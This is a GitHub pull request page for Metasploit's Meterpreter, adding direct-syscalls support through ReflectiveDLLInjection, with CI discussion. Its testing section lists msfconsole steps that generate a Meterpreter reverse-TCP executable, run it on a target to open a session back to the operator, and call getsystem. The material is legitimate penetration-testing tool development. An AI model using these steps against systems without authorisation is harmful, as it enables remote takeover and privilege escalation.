-
Notifications
You must be signed in to change notification settings - Fork 675
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Pull in changes from ReflectiveDLLInjection to support direct syscalls #688
Conversation
Looks like a CI failure on mingw
|
It is expected since the |
Ah; Is it worth temporarily updating the submodule config file to point to your branch so we can verify CI passes here? 👀 |
9984ac3
to
65bd36b
Compare
Thanks @adfoster-r7 for the suggestion, I've updated the submodule config in the last commit. CI passes now. |
Cool! 🎉 For visibility, I've created a PR to run the Windows compilation on VS2019 over here now too - #689 |
Closing it since a new updated PR exists. |
This PR adds the necessary changes to support the direct syscalls version of
ReflectiveDLLInjection
. At this time, the related PR is still under review but it is possible to test by updating theReflectiveDLLInjection
submodule reference:Don't forget to
git fetch
/git checkout
again if theReflectiveDLLInjection
branch is updated.Follow the standard documentation to build Meterpreter on Windows and with MinGW.
Note that CI is failing because the
ReflectiveDLLInjection
submodule needs to be updated to point to the direct syscalls implementation.Testing with MSF
Once the DLL's are built, you need to copy
output/
directory content into the Metasploit Framework'sdata/meterpreter/
directory.Then in MSF console, test Meterpreter payloads (staged and single).
For example:
use windows/x64/meterpreter_reverse_tcp
set LHOST <your host IP>
generate -f exe -o direct_syscalls_payload.exe
to_handler
direct_syscalls_payload.exe
to the target and execute it, you should get a session.WARNING: Local file .../data/meterpreter/ext_server_stdapi.x64.dll is being used
getsystem
, etc. without issues.